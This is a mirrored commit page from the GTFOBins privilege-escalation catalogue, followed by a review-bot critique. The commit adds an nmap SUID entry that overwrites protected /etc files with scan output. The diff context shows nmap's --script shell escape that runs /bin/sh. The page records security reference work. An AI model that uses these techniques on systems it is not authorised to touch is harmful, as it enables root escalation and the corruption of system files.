mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Adding another usage of Nmap's SUID
I came across this method on Stack Overflow while trying to execute commands using a SUID nmap binary; `--script` failed me, but this works. It could be enough to demonstrate the effect of using SUID on Nmap. I've yet to come up with a way to overwrite the contents of the system file with what we want; with this we can only overwrite files with nmap output.

```bash
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
```
This commit is contained in:
parent 1c07880178
commit edc8a2d03d
@ -108,4 +108,9 @@ functions:
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF
- description: This will over-write files with nmap output, use with caution.
code: |
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
---
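Review bot: the added item is appended to the function whose last entry is `./nmap --script=$TF`, presumably the SUID one, yet its code opens with `sudo touch /etc/filecantbetouched`, which presupposes sudo rather than the SUID bit the commit title describes and is unneeded anyway, since `-oN` creates the output file itself. Drop the `sudo touch` and `cat` lines (the latter only verifies the result), replace the hardcoded path with the repository's `LFILE=file_to_write` convention so the single line reads `nmap 127.0.0.1 -oN=$LFILE`, and make the description state the effect precisely: the target file is overwritten with nmap's own output, not with content chosen by the user, so this is a write with uncontrolled content. "use with caution" and the spelling "over-write" do not match the style of the other descriptions in the file.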